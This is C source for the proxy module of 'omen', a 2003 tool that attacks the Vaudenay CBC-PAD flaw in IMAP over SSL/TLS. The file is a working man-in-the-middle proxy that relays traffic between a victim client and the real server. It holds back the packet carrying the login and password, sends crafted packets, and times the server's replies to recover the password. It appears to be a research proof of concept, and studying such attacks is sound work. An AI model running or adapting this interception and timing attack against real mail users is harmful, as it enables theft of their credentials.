/*
 * omen  - Attack of the Vau[02] CBC-PAD flaw with Imap over SSL/TLS
 *
 * Copyright (c) 2003 Martin Vuagnoux <martin@vuagnoux.com>
 *
 * omen  is free software; you can redistribute it and/or modify it under
 * the terms of the GNU General Public License as published by the Free
 * Software Foundation; either version 2, or (at your option) any later
 * version.
 *
 * omen  is distributed in the hope that it will be useful, but WITHOUT ANY
 * WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
 * FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more
 * details.
 *
 * You should have received a copy of the GNU General Public License along
 * with wavemon; see the file COPYING.  If not, write to the Free Software
 * Foundation, 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
 */


#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <ncurses.h>

#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <errno.h>

#include <sys/time.h>

#include "conf.h"
#include "cbc_sha_attack.h"
#include "proxy.h"
#include "tls.h"
#include "ui.h"

#undef max
#define max(x,y) ((x) > (y) ? (x) : (y))

/* create listen socket and connection sockets */
int init_proxy(struct cbcPadConf *conf)
{
  /* socket init */
  struct sockaddr_in myAddr;
  struct sockaddr_in fromAddr;
  struct sockaddr_in toAddr;
  struct hostent *h;

  int len;
  int key;

  /* select init */
  fd_set rd;
  int r;
  int n;

  /* socket init */
  r = -1;
  conf->s = -1;
  conf->c = -1;
  conf->m = -1;

  /* init */
  key = 0;
  n = 0;

  bzero((char *) &myAddr, sizeof(myAddr));
  myAddr.sin_family = AF_INET;
  myAddr.sin_port = htons(conf->listenPort);

  /* socket */
  if ((conf->m = socket(PF_INET, SOCK_STREAM, 0)) == 0) {
    wattron(conf->debugWin, COLOR_PAIR(COLOR_RED));
    wprintw(conf->debugWin, "\n[E]::Socket Error! quitting.\n");
    wrefresh(conf->debugWin);
    return -1;
  }

  /* bind */
  if (bind(conf->m, (struct sockaddr *)&myAddr, sizeof(myAddr)) < 0) {
    close(conf->m);
    wattron(conf->debugWin, COLOR_PAIR(COLOR_RED));
    wprintw(conf->debugWin, "\n[E]::Bind Error! quitting.\n");
    wrefresh(conf->debugWin);
    return -1;
  }


  
  wprintw(conf->debugWin, "Waiting for a connection on port: %d\n", conf->listenPort); 
  wrefresh(conf->debugWin);

 /* listen ( one queue) */
  listen(conf->m, 1);

  /* **************** one time configuration ********************/

  /* IMAP */
  if (conf->type == 0) {
    /* we cannot attack the first block with one pkt */
    conf->current_block = 1;
    conf->current_word = 7;
  }
  /* GENERIC */
  conf->attack_word[0] = 0x74;

  /* OMEN MODE: This mode is used to find dynamicly the threshold.
   * we know a packet (the 3rd). It's 2nd block is [ABILITY<0xd>]
   * so we can bruteforce ten or more bad_record_mac and decryption_failed
   */
  if (conf->threshold == -1) {
    conf->attack_word[0] = 0xd;
  }
  conf->first_attack = 0x00;

  /**************************************************************
   *                    MAIN PROXY LOOP                         *
   **************************************************************/
  while(1) {

    /* here we parse the interactive (understand keyboard keystroke) action */
    key = getch();
    /* print passwd in hexa */
    if (key == 'h') {
      print_passwd_hexa(conf);
    }
    /* quit */
    if (key == 'q') {
      exit_success(conf); 
    }

    /* we use select to listen on both sockets (but blocked sockets!) */
    FD_ZERO(&rd);
    FD_SET(conf->m, &rd);
    
    /* we take the bigger socket descriptor */
    n = max(n, conf->m);

    /* client connection is done, we listen on the socket */
    if (conf->c > 0) {
      FD_SET(conf->c, &rd);
      n = max(n, conf->c);
    }

    /* server connection is done, we listen on the socket */
    if (conf->s > 0) {
      FD_SET(conf->s, &rd);
      n = max(n, conf->s);
    }
    
    r = select(n+1, &rd, NULL, NULL, NULL);
    if (r == -1 && errno == EINTR)
      continue;
    if (r < 0) {

      close(conf->m);
      wattron(conf->debugWin, COLOR_PAIR(COLOR_RED));
      wprintw(conf->debugWin, "\n[E]::select Error! quitting.\n");
      wrefresh(conf->debugWin);
      perror ("select()");

      return -1;
    }

    /* Client (victim) connection */
    if (FD_ISSET (conf->m, &rd)) {
      len = sizeof(fromAddr);      
      /* accept */ 
      conf->c = accept(conf->m, (struct sockaddr *)&fromAddr, &len);
      if (conf->c < 0) {

	wattron(conf->debugWin, COLOR_PAIR(COLOR_RED));
	wprintw(conf->debugWin, "\n[E]::accept Error! quitting.\n");
	wrefresh(conf->debugWin);
	// perror("accept():");
	return -1;

      }
      /* parse the data */
      // wattron(conf->debugWin, A_BOLD);
      // wprintw(conf->debugWin, "Connection! From: %s\n",inet_ntoa(fromAddr.sin_addr));
      // wattroff(conf->debugWin, A_BOLD);
      // wprintw(conf->debugWin, "Making a connection to %s:%d\n",conf->host,conf->hostPort);
      // wrefresh(conf->debugWin);
      
      /* name resolving */
      // wprintw(conf->debugWin, "Name resolving: %s ", conf->host);
      if ((h = gethostbyname(conf->host)) == NULL) {

	close(conf->m);
	close(conf->c);
	wattron(conf->debugWin, COLOR_PAIR(COLOR_RED));
	wprintw(conf->debugWin, "\n[E]::gethostbyname Error! quitting.\n");
	wrefresh(conf->debugWin);
	return -1;

      }
      // wprintw(conf->debugWin, "(%s)\n", inet_ntoa( *(struct in_addr *)h->h_addr_list[0]));
      
      bzero((char *) &toAddr, sizeof(toAddr));
      bcopy(h->h_addr, (char *)&toAddr.sin_addr, h->h_length);
      toAddr.sin_family = AF_INET;
      toAddr.sin_port = htons((short) conf->hostPort); 
      
      /* socket */
      if ((conf->s = socket(PF_INET, SOCK_STREAM, 0)) < 0) {

	close(conf->m);
	close(conf->c);
	wattron(conf->debugWin, COLOR_PAIR(COLOR_RED));
	wprintw(conf->debugWin, "\n[E]::Socket Error! quitting.\n");
	wrefresh(conf->debugWin);
	return -1;

      }
      
      /* connect */
      if (connect(conf->s, (struct sockaddr *)&toAddr, sizeof(toAddr)) < 0) {

	close_sockets(conf);
	wattron(conf->debugWin, COLOR_PAIR(COLOR_RED));
	wprintw(conf->debugWin, "\n[E]::Connect Error! quitting.\n");
	// perror("connect();");
	wrefresh(conf->debugWin);
	return -1;

      }
      
      // wattron(conf->debugWin, A_BOLD);
      // wprintw(conf->debugWin, "Connection! To: %s:%d\n",conf->host,conf->hostPort);
      // wattroff(conf->debugWin, A_BOLD);
      // wrefresh(conf->debugWin);

      /* init pkt_data */
      conf->pkt_data = 0;
      
      /* now we parse transmission. Different method if it's a IMAP attack
       * or other so we analysis principally the conf->pkt_data which is
       * the number of the interesting data record packet.
       *
       */
      
      /* IMAP */
      if (conf->type == 0) {

	/* IMAP: Localhost   : the 4th packet contains the login/passwd */
	// conf->pkt_data_end = 4; 
	/* IMAP: LAN+Internet: the 6th packet contains the login/passwd */
	conf->pkt_data_end = 6;
	/* If we are in the OMEN mode ie: try to find the threshold 
	 * we check the 3th packet wich contains:
	 * [XXXX CAP][ABILITY<0xd>][<0xa>...] 
	 * (Thanks to Windows to add the <0xd> :))
	 * so we can make bad_record_mac resquest with this know block 
	 */
	if (conf->threshold == -1) {
	  /* IMAP: Localhost and sometimes */
	  // conf->pkt_data_end = 2;
	  /* IMAP: Normal value */
	  conf->pkt_data_end = 3;
	}

	// wattron(conf->debugWin, A_BOLD);
	// wprintw(conf->debugWin, "Beginning IMAP over TLS attack.\n\n");
	// wattroff(conf->debugWin, A_BOLD);
	// wrefresh(conf->debugWin);
	wprintw(conf->tlsWin, "\n");
	wrefresh(conf->tlsWin);
      }

      /* no other attack yet */
      else {
	close_sockets(conf);
	wattron(conf->debugWin, COLOR_PAIR(COLOR_RED));
	wprintw(conf->debugWin, "[E]::Attack not yet implemented!\n");
	wrefresh(conf->debugWin);
	return -1;
      }
    }

    /* GENERIC PART */
    if (conf->c > 0) {
      /* we have a packet from the client (victim) */
      if (FD_ISSET(conf->c, &rd)) {

	/* the client send the login/passwd packet */
	if (conf->pkt_data_end == conf->pkt_data+1) {

	  /* we receive the packet, not forwarded */
	  pkt_recv_client(conf);

	  /* if first time we allocate memory for the cipher to decipher */
	  if (conf->first_data_flag == 1) {
	    /* packet a multiple of 8 */
	    if ((conf->pkt_size-5)%8 == 0) 
	      conf->nb_block = (conf->pkt_size-5)/8;
	    /* if no tls pkt -> error */
	    else
	      conf->nb_block = (conf->pkt_size-5)/8 + 1;

	    /* malloc password */
	    conf->passwd = malloc(conf->nb_block*8);
	    memset(conf->passwd,'?', conf->nb_block*8);

	    /* init the flag */
	    conf->first_data_flag = 0;

	  }

	  /* we build the attack's packet */
	  crack(conf); 

	  /* close connections */
	  close(conf->c);
	  close(conf->s);
	  conf->c = -1;
	  conf->s = -1;
	  continue;
	}
	else {
	  /* normal forwarding */
	  r = client_to_server(conf);
	  if (r == 0)
	    continue;
	  if (r < 0)
	    return -1;
	}
      }
    } 
    
    if (conf->s > 0) {
      /* we have a packet from the server */
      if (FD_ISSET(conf->s, &rd)) {
	r = server_to_client(conf);
        if (r == 0)
          continue;
        if (r < 0)
          return -1;

      }
    }
  }        
  /* never go there normally */
  close_sockets(conf);
  return 0; 
}
  
  void close_sockets(struct cbcPadConf *conf) 
{
  wprintw(conf->debugWin, "Close connections\n");
  wrefresh(conf->debugWin);
  close(conf->c);
  close(conf->s);
  close(conf->m);
  
}



/* parse client to server packet (all type).
 * the return value = -1 if error -> quit
 *                     1 if ok
 */
int client_to_server(struct cbcPadConf *conf)
{
  int result;

  /* first init buffer */
  bzero(conf->pkt, MAX_PKT_SIZE);
  /* copy data from client in buffer */
  conf->pkt_size = read(conf->c, conf->pkt, MAX_PKT_SIZE);
  if (conf->pkt_size == 0) {
    close(conf->c);
    close(conf->s);
    conf->c = -1;
    conf->s = -1;
    return 0;
  }
  else if (conf->pkt_size < 0) {
    /* sometimes OE reset the connection :( so we don't parse the error
     * we just consider a end of connection and a continue
     *
     */

    // wattron(conf->debugWin, COLOR_PAIR(COLOR_RED));
    // wprintw(conf->debugWin, "\n[E]::C>S: recv() Error! quitting.\n");
    // wrefresh(conf->debugWin);
    // perror("c>s: read()");
    // return -1;
    close(conf->c);
    close(conf->s);

    conf->c = -1;
    conf->s = -1;
    return 0;
  }
 
  /* parse packet type. Warning! stream TCP maybe more than one pkt
   * on a read/write call! 
   */
  conf->offset = 0;
  do {
    result = parse_tls_pkt(conf, 0);
  } 
  while (result == 0);
  conf->offset = 0;

  /* error */
  if (result < 0) { 
    return -1;
  }
  else {
    /* forward packet to server */
    write(conf->s, conf->pkt, conf->pkt_size);
    return 1;
  }
}






/* parse server to client packet (all type) 
 * the return value = -1 if error -> quit
 *                  =  0 (connection closed)
 *                  =  1 pkt -> conf struct updated!
 *
 * this function run a timer for the time attack
 */
int server_to_client(struct cbcPadConf *conf)
{

  int result;
  
  /* first init buffer */
  bzero(conf->pkt, MAX_PKT_SIZE);
  /* copy data from client in buffer */
  conf->pkt_size = read(conf->s, conf->pkt, MAX_PKT_SIZE);
  
  /* timing when pkt is received on conf->tv2 */
  gettimeofday(&conf->tv2, &conf->tz);

  if (conf->pkt_size == 0) {
    close(conf->s);
    close(conf->c);
    conf->s = -1;
    conf->c = -1;
    return 0;
  }
  else if (conf->pkt_size < 0) {
    /* sometimes OE reset the connection :( so we don't parse the error
     * we just consider a end of connection and a continue
     *
     */

    // wattron(conf->debugWin, COLOR_PAIR(COLOR_RED));
    // wprintw(conf->debugWin, "\n[E]::S>C: recv() Error! quitting.\n");
    // wrefresh(conf->debugWin);
    // perror("s>c:recv()");
    // return -1;
    close(conf->s);
    close(conf->c);

    conf->s = -1;
    conf->c = -1;

    return 0;
  }

  /* parse packet type. Warning! stream TCP maybe more than one pkt
   * on a recv/send call!
   */
  conf->offset = 0;
  do {
    result = parse_tls_pkt(conf, 1);
   }
  while (result == 0);
  conf->offset = 0;

  /* error */
  if (result < 0) {
    return -1;
  }
  else {
    /* forward packet to server */
    write(conf->c, conf->pkt, conf->pkt_size);
    return 1;
  }
}

/* just send conf->pkt to the server (no error check)
 * WE PARSE ONLY THE FIRST PACKET! If others packets on the
 * stream they are not important because we stop analysing here
 * (this is the good pkt)
 *
 * for the timing attack we initialize conf->tv1
 */
void pkt_send_server(struct cbcPadConf *conf)
{
  
  /* reset offset */
  conf->offset = 0;
  write(conf->s, conf->pkt, conf->pkt_size);

  /* time attack init. No error check (gain time) */
  gettimeofday(&conf->tv1, &conf->tz);
  
  /*reset offset */
  conf->offset = 0;
}

/* just receive pkt from the client (no error check) 
 * WE PARSE ONLY THE FIRST PACKET! If others packets on the
 * stream they are not important because we stop analysing here
 * (this is the good pkt)
 */
void pkt_recv_client(struct cbcPadConf *conf)
{
  int result;

  /* reset offset */
  conf->offset = 0;
  conf->pkt_size = read(conf->c, conf->pkt, MAX_PKT_SIZE);
  /* we use the tls UI */
  result = parse_tls_pkt(conf, 0);
  /* reset offset */
  conf->offset = 0;
}
